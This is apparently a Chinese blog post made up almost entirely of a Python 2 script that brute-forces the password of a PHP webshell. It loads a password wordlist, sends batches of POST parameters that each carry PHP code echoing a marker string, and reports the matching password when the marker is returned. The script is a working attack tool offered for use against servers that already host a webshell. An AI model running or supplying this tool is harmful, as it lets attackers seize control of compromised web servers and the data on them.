竞争无处不在,青春永不言败!专业撸代码,副业修bug

Talk is cheap , show me the code!



python 爆破

python 爆破

#!/usr/bin/python
#-*- coding: GB2312 -*-
#author:loversorry
import urllib2
import urllib
import os
import sys
import getopt
import base64

def usage():
    print sys.argv[0]+" -u [url]http://www.xxx.com/webshell.php[/url] -t php -f ./password.txt -i 1000"

def readFile():
    posts = {}
    posts_arr = []
    f = open(file_name,'r')
    i = 0
    for line in f.readlines():
        line = line.replace('\n','')
        temp = base64.b64encode(line+'**==**1a1a1a').replace('=','');
        posts[line]='$a=%s;$b=base64_decode($a);echo($b);' % temp
        i = i+1
        if i>int(num)-1:
            posts_arr.append(str(posts))
            posts.clear()
            i = 0
    if len(posts):
        posts_arr.append(str(posts))
    f.close()
    return posts_arr

def intruder(postDatas):
    headers = {
        'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'
    }
    ok = False
    for item in range(len(postDatas)):
        postData = postDatas[item]
        postData = urllib.urlencode(eval(postData))
        request = urllib2.Request(url,postData,headers)
        response = urllib2.urlopen(request)
        text = response.read()
        if text.find('1a1a1a') <> -1:
            print '\n破解成功,密码为:'+text.split('**==**')[0]
            ok = True
            break
        else:
            sys.stdout.write(".")
    return ok

if __name__ == '__main__':
    opts,args = getopt.getopt(sys.argv[1:],'hu:t:f:i:')
    url = ''
    server_type = ''
    file_name = ''
    num = ''
    for opt,value in opts:
        if opt == '-u':
            url = value
        elif opt == '-t':
            file_name =  value
        elif opt == '-f':
            file_name = value
        elif opt == '-i':
            num = value
        elif opt == '-h':
            usage()
            sys.exit()
    if file_name == '' or num == '' or url == '':
        usage()
        sys.exit()    
    sys.stdout.write("开始破解:")
    if intruder(readFile()) == False:
        print '\n破解失败,换字典试试!'
posted @ 2018-07-05 15:48  云雾散人  阅读(236)  评论(0编辑  收藏  举报

Your attitude not your aptitude will determine your altitude!

如果有来生,一个人去远行,看不同的风景,感受生命的活力!